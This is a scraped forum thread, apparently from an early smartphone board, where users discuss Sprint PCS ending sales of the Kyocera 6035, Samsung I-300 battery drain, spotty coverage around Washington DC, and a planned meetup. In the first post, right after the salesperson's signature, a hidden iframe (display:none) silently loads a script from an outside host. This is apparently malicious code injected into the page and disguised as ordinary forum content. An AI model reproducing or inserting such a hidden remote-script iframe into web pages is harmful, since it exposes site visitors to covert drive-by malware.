+ Reply to Thread
Page 1 of 2 1 2 LastLast

Lightbulb 6035, going, going.....gone 5/17

Just FYI-

Our last day to order the Kyocera 6035 is May 17th. Until then I can still get it at NO COST for new customers or existing customers wanting to add a new line to there account.

SprintPCSguy<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I-300 Novice

Kyocera 6035 Replacement

Any information on the unit replacing the 6035?

I love the concept of the Samsung I-300, but the battery life of 30 minutes of talk time and standby until the middle of the day is driving me nuts.

In additon, I find dialing the I-300 while driving difficult. I guess I have to get into the Voice Command system.

Any info on any new smartphones will be appreciated. Thanks!
    Ahmed V. Ismail
    A Smartphone Addict

30 mins? Whatcha talking bout willis?

RJS

Re: Kyocera 6035 Replacement

If you're only getting 30 min of talk time, then one of two things are happening.

1. You are talking in analog roam
    2. You have a defective battery

I would get it checked out at a service center. They have diagnostics that can see if it's drawing too much power.

Originally posted by PHCismail
    Any information on the unit replacing the 6035?

I love the concept of the Samsung I-300, but the battery life of 30 minutes of talk time and standby until the middle of the day is driving me nuts.

Also be sure to enable auto-off of the screen after 30 seconds. You should NOT be getting only 30 minutes of talk time.

tell me more about the Kyocera 6035 at no cost. I'm an exsiting Sprint PCS customer, but my term agreement is coming up for renewal.

Hi,
    Please post or email me with info on getting the Kyo 6035 at no cost! I would greatly appreciate it.

Thanks much,

Turambar

I can't believe you only get 30 minutes of talk time. I use my I300 constantly for both conversations and PDA applications. In a typical day, I often have 3 or more conference calls lasting an hour or more each. I've never run out of battery time in a day of usage. You must have a defective unit or battery.

Are the K6035 units new or refurbished? What is required to receive a unit? Can unit be used as PDA only?

Lightbulb Kyocera 6035 info.

Glad to hear there's still interest in the 6035, it's a great phone (especially for the price). Those of you who are just wanting to replace your existing phone (you're already with Sprint PCS) I would advise calling customer care and seeing if you can get a service credit on your account if you're not still under contract. Sometimes if you're not under contract Sprint will give you a $100. service credit for a 2 year continued agreement.

Those of you that are not Sprint customers (few I'm sure on this board ) can e-mail or call me if you're seriously wanting to get the phone.

steve@voyagercommunications

or

615-496-5794

As a side note, re. the battery life of the I-300, you should be getting about 3-4 hours talk-time per battery, if not take it to the Sprint store and see if they can test it and/or swap it out for another one.

SprintPCSguy

aka. Steve

New or Refirbished?

The Kyoceras are new units, and yes they can be used as a PDA w/o having the phone on or even working. But I cannot get someone a free phone w/o service (dahh).

I too am getting only 30 min. talk time and half a day standby. It is driving me to get rid of the phone. I believe it is due to the fact that even when I have the analog roaming off, when the phone goes in and out of network coverage (it is bad where I live) it still does the analog coverage check.

The reason I suspect that is when I am in New York City, where I have great coverage, I find that my battery life is amazing. When I am in NYC I love the phone. When I am in the Washington DC suburbs...the phone is just a big paper weight.

-Brainjuice

Originally posted by mdfmail
    I can't believe you only get 30 minutes of talk time. I use my I300 constantly for both conversations and PDA applications. In a typical day, I often have 3 or more conference calls lasting an hour or more each. I've never run out of battery time in a day of usage. You must have a defective unit or battery.

Are the K6035 units new or refurbished? What is required to receive a unit? Can unit be used as PDA only?

Unhappy kYOCERA'S DUN GONE...

Sorry to inform you the 6035's are gone. We still have awesome savings on the I300's though!

Sorry to hear the D.C. suburbs are spotty, I'll be heading out there the 2nd week of August for a lil' R&R.

SprintPCSguy

Administrator

Arrow

i can atest to the RE: dc suburbs.. coverage is spotty here... someplaces in the house i can talk, but we have to go out on the balcony to have any great coverage....

and the fact that verizon has this whole area on lock down.. its awful!!

but that wont make me change to verizon...

Hey steve,
    If/when the 7135 comes out on sprint, I'll be giving you a call to add a new line to my account, hope you can still get the $200 rebate, or something better .

Jorge

i can atest to the RE: dc suburbs.. coverage is spotty here
    I'm 50 mi. out of DC and B'More. If you think it's spotty in DC you oughta try it out here. It follows I270 & I70 and varies from 10 miles either side of the freeway to 100 yards or so with no apparent rhyme nor reason.
    .....beam me up Scotty...

Administrator

Arrow

petewat, you coming to our hangout on saturday?

robert, RE: out on the balcony.. hehehe..... thats kinda the best place for us right now... i did get the latest prl updates for both phones and i i havent had a chance to really see if it helped, but i do get better coverage in my studio in our place.. and its tons of RF energy in here!

yeah , im with robert.. we will scrape our money together to get you down here (or up here) to show us the 7135~!

yo robert, i have been with sprint sicne they were sprint sprectrum and this is the worse i have seen their coveage.. but ocne i get out on the street, i get full signal.. so its these damn trees around here i guess.. but im sure it will get better. and when im in dc, ive had 100% everywhere i went.

...hangout?

Administrator

Arrow

MJ, we are having a smartphone get together at chevy's here in MD on this saturday.

Administrator

Arrow

thats sounds like a good idea.. if you can afford to use up the paper!

looking forward to it as well.. and we really need to rally to get the pcs guy here for our own little private 7135 show...

did steve say he had a demo 7135? I'll fly out, just to see it. I wish I could, but I have plans already. If steve (sprintpcsguy) has one, then it's confirmed it will be available with sprint.

Jorge